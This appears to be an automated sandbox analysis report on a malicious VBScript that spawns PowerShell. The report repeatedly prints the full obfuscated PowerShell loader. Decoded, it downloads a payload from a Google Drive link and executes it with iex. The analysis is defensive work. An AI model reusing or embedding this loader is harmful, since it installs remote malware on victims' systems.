Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1433043987.000002497601B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1433043987.000002497604B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1434067052.00000249760C1000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($S", "0")
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nonconstruction) if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView")
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnu
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnuJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFE7E8B7287 push esp; retf 2_2_00007FFE7E8B7288
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFE7E8B7395 pushad ; iretd 2_2_00007FFE7E8B7399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFE7E8B00BD pushad ; iretd 2_2_00007FFE7E8B00C1
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5899Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3929Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 6656Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000002.00000002.1434786548.00000249762DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllar
Source: wscript.exe, 00000000.00000002.1274957057.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1261099744.0000023CBC2DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1261364401.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260291454.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260964452.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1268737040.0000023CBC2DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260726728.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1268737040.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1274923366.0000023CBC2DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1269498724.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260726728.0000023CBC2B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1272821991.0000023CBC5C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}_~e
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnuJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fldekager.Con && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$undervisningsdisketterne = 1;$strafferammen='substrin';$strafferammen+='g';function toxophilism87($sanerendes){$uneath=$sanerendes.length-$undervisningsdisketterne;for($vacciners=5; $vacciners -lt $uneath; $vacciners+=(6)){$ceylonite+=$sanerendes.$strafferammen.invoke($vacciners, $undervisningsdisketterne);}$ceylonite;}function anthropometry($registrating){& ($bothroi) ($registrating);}$gimmerlams=toxophilism87 'ke nemnovelo tarszebonii nonslmadrelom kiafiske/luffi5,isun. algn0fagbl micon( re lwvejovi.ecannfilmaddockiostudewghi esogre. .rocanreal tuncon s,kke1 pars0gsteh.ublod0,risv; ata m,crow smndicatapnbefly6ext.a4expos;lande laissxkolon6habit4tandb;suppe brndrgloriv sel,: buke1latin2s,eat1baand. col,0overm)cloch vavtogfodboerichec.ellmkwhango,leuk/fo,ok2nim u0fests1.eesf0thema0skrum1marin0ilyas1attr, godffpassainon rrmode.ebromdfaandeomopedxre ri/haand1pht.i2extem1t,lsp.broug0kaske ';$nyttendes=toxophilism87 ' spapudampis.orpuebrugerlabio-phymaakllingwergiekarklnhexadtir,ny ';$fraraadede=toxophilism87 'tentah fientharesttrstepfa,cislenna: guns/fabri/underd underurediimilitvt,ereeassyr.herm ghu oeoox dioflelsghornylrow,iestere.realkc grefo tallmunend/statsuba.saccolle? t.ndepejlix kiefpdovneooutmarnuchatu,ndf=quantdjiliaointerwtalernbjlenl midto tilpa diskdtakof& overislen,delevr=unpro1 reabqhovedl bevildis.erbrand6ekspaccho.diudv,kwhexadfpiperpb,ksedspermugymnolfu.iofhalvfjzucc,ca keruun,huc assap or ag lami8photo-tiemagstemmkoutglytrbesk fyrsitappexufor hoverbbbarflztaktlainddk ';$pjankede=toxophilism87 'grune>trste ';$bothroi=toxophilism87 'unobeicereve alarxbrock ';$perfektibilitet = toxophilism87 'centuefla.kcassonhsceneodil t di.ul%.ianoasubmupmarkoperhvednonira,ndettshutoa acch%r,mod\pr tefc,ntrlqu nod.eaveealderkg lgeatulreg islneb fanrforur.samfuctaxikopreponvarme p.dal& andm&coc f mikretapnecp,eudhsporiodezin frike$ ncon ';anthropometry (toxophilism87 'poka,$aarstgtillglg,bisobrevsbstrigasynsol pal :sannalkulhyi frigqstaalu e,evouniv rjuv.ni vands kjerhskrmt= fors( ablacabr,kmnonredsuper sipun/ svincsanct jaque$,iltrp akemefustirnarkofbludge varmkmiljbtfolleimodstbswerviye.selfab,lilderrtpropie beket,oist)anemo ');anthropometry (toxophilism87 'cst.d$ens,agphenolsensuosyddab b fia,ocialfnull: pranudebitnnarcodf ldmeonsetrshaftv ukorgspitftuntolim rragsangshtolv,e tyr,datomusc,lic1arbej3fo ge4eneba=brunk$stokefneds,rclewkabacksrui,enamaxima recids,oene klipd polyeunsad. ber s pinepre.atl .akoihs patun.es( send$ semip nedsjslagvanonsan steekundune,ochudabse epr.li)amfit ');$fraraadede=$undervgtigheds134[0];anthropometry (toxophilism87 